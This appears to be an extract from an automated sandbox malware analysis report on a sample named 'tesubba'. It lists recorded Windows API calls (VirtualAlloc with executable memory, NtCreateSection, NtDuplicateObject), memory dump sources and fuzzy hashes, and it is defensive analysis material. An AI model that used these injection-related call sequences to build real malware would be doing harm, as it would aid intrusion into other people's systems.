                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 537 5d017e-5d01b8 call 5d0491 540 5d01ba-5d01ed VirtualAlloc call 5d020b 537->540 541 5d0206 537->541 543 5d01f2-5d0204 540->543 541->541 543->541
                                                                                                            APIs
                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005D01CF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.1688128712.00000000005CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 005CD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_5cd000_tesubba.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 4275171209-0
                                                                                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                            • Instruction ID: 60788a742c64776e54784f44ec570ccbfcc81a7c3646c8970c12ee563341e4fe
                                                                                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                            • Instruction Fuzzy Hash: 97112D79A00208EFDB11DF98C989E99BFF5AF08350F058095F9489B361D371EA90DB80
                                                                                                            APIs
                                                                                                            • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                              • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                              • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.1687803922.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_400000_tesubba.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 4152845823-0
                                                                                                            • Opcode ID: 038fd76a8208d0ddfff32e2f40036fbca87feb8e69a48f33ff6f35dc682cef07
                                                                                                            • Instruction ID: 207861a3759c1b147de2553678edefd9187cc257709d93c52e233f88d5e7a3be
                                                                                                            • Opcode Fuzzy Hash: 038fd76a8208d0ddfff32e2f40036fbca87feb8e69a48f33ff6f35dc682cef07
                                                                                                            • Instruction Fuzzy Hash: B70169F1208209FBEB009A908D61EBA3668AB05760F700133BA13781F5D57C9A53E76B
                                                                                                            APIs
                                                                                                            • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                              • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                              • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.1687803922.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_400000_tesubba.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 4152845823-0
                                                                                                            • Opcode ID: c88f444a594768d2d4fab485523800559cc166debe3a6fe30cf89bfb996ff5f6
                                                                                                            • Instruction ID: 578df434b3d236032839297bc76fd9486bb072801922ad90ba2380d7086ecf03
                                                                                                            • Opcode Fuzzy Hash: c88f444a594768d2d4fab485523800559cc166debe3a6fe30cf89bfb996ff5f6
                                                                                                            • Instruction Fuzzy Hash: 95F05EB1208209FBEF009F908D61EAA3729AF05710F644137BA52781F5D63CDA53EB1B
                                                                                                            APIs
                                                                                                            • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                              • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                              • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.1687803922.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_400000_tesubba.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 4152845823-0
                                                                                                            • Opcode ID: 45864dc147576a9e119c499a9794f12b744a0bfa5c226a532e69094f16d3b09b
                                                                                                            • Instruction ID: b5d34a972f1ec939c421f577379ccf4d396b21f1793fd223155277739043cea6
                                                                                                            • Opcode Fuzzy Hash: 45864dc147576a9e119c499a9794f12b744a0bfa5c226a532e69094f16d3b09b
                                                                                                            • Instruction Fuzzy Hash: 5AF05EB1218209FBEB009F908D61EBA3629AF05310F644177BA12781F5C63DDA23E75B
                                                                                                            APIs
                                                                                                            • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                              • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                              • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.1687803922.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_400000_tesubba.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 4152845823-0
                                                                                                            • Opcode ID: 14db16c3e861f19ad5dfd30c38be67768c01ca1c8fcdc6992631d9b2414dadb5
                                                                                                            • Instruction ID: c277f467d3f9426b8f9a73765fdcab00a649fd51b95b24d53f0d4f33e3e8ae71
                                                                                                            • Opcode Fuzzy Hash: 14db16c3e861f19ad5dfd30c38be67768c01ca1c8fcdc6992631d9b2414dadb5
                                                                                                            • Instruction Fuzzy Hash: F7F037B1108209FBDF009F94CD51EAA3729AF09310F644577BA12781F5C63DDA12E72B
                                                                                                            APIs
                                                                                                            • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                              • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                              • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.1687803922.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_400000_tesubba.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDuplicateObjectSectionSleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 4152845823-0
                                                                                                            • Opcode ID: d565b972daf1ea01d692af33d09a01f0ed4f5aa4668cdc6292c3b22aaefac0ec
                                                                                                            • Instruction ID: 30c85490bd3e36b3d7497cee73256dee3cb4488b2b17691bada95d8d1bd3f612
                                                                                                            • Opcode Fuzzy Hash: d565b972daf1ea01d692af33d09a01f0ed4f5aa4668cdc6292c3b22aaefac0ec
                                                                                                            • Instruction Fuzzy Hash: 33F037B1204205FBDF009F94CD91EAE3629AF05310F644173BA12791F5D67DDA12E75B
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNELBASE(00000000,00513D6C,00418DAF), ref: 00418748
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.1687832752.000000000040B000.00000020.00000001.01000000.00000008.sdmp, Offset: 0040B000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_40b000_tesubba.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocLocal
                                                                                                            • String ID:
                                                                                                            • API String ID: 3494564517-0
                                                                                                            • Opcode ID: 8edb2acf596b02bf36b0311ec2b3e3f34bd0854dc09103549fc4bb4fc422a900
                                                                                                            • Instruction ID: 68696ac1b9cb92420161d977e59fd9b705cf74f057d8962c0b4e3d7dbc73b596
                                                                                                            • Opcode Fuzzy Hash: 8edb2acf596b02bf36b0311ec2b3e3f34bd0854dc09103549fc4bb4fc422a900
                                                                                                            • Instruction Fuzzy Hash: FDB012F0A492009FD700CF54FC64BD03B74F358302F00C061F500C2164EB304908EB10
                                                                                                            APIs
                                                                                                            • QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00418A04
                                                                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418A1F
                                                                                                            • HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 00418A42
                                                                                                            • GetNumaProcessorNode.KERNEL32(?,00000000), ref: 00418A51
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.1687832752.000000000040B000.00000020.00000001.01000000.00000008.sdmp, Offset: 0040B000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_40b000_tesubba.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                                                                                                            • String ID:
                                                                                                            • API String ID: 2776817195-0
                                                                                                            • Opcode ID: 87efacac19a89b0c53b9dbb33d5e1312a162f1387c04757d6307752c4e174176
                                                                                                            • Instruction ID: bd9cb2cda3ccdbb603686fa1a54157cb247b1e4b5f6e470ed3bcac1d3601a900
                                                                                                            • Opcode Fuzzy Hash: 87efacac19a89b0c53b9dbb33d5e1312a162f1387c04757d6307752c4e174176
                                                                                                            • Instruction Fuzzy Hash: ED018474A402049BD760EB64EC55BE937B8FB1C755F00807BFA05A72D0DE746E88CB9A
                                                                                                            APIs
                                                                                                            • BuildCommDCBA.KERNEL32(00000000,?), ref: 00418964
                                                                                                            • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418976
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.1687832752.000000000040B000.00000020.00000001.01000000.00000008.sdmp, Offset: 0040B000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_40b000_tesubba.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: BuildCommEnvironmentFreeStrings
                                                                                                            • String ID: -
                                                                                                            • API String ID: 2991353152-2547889144
                                                                                                            • Opcode ID: a724ab6c00ba43ed920c74289dad73afc07e5f40d831fe2fe4a3629ab1fe5b50
                                                                                                            • Instruction ID: b4672369b185086f5e4321c569724b1a241b362aa46ae39454cd2dcc54bfc028
                                                                                                            • Opcode Fuzzy Hash: a724ab6c00ba43ed920c74289dad73afc07e5f40d831fe2fe4a3629ab1fe5b50
                                                                                                            • Instruction Fuzzy Hash: 2DF0FCB18242449ADB119BA5DD807FE7B68E709330F51422EED0466240CB794EC59797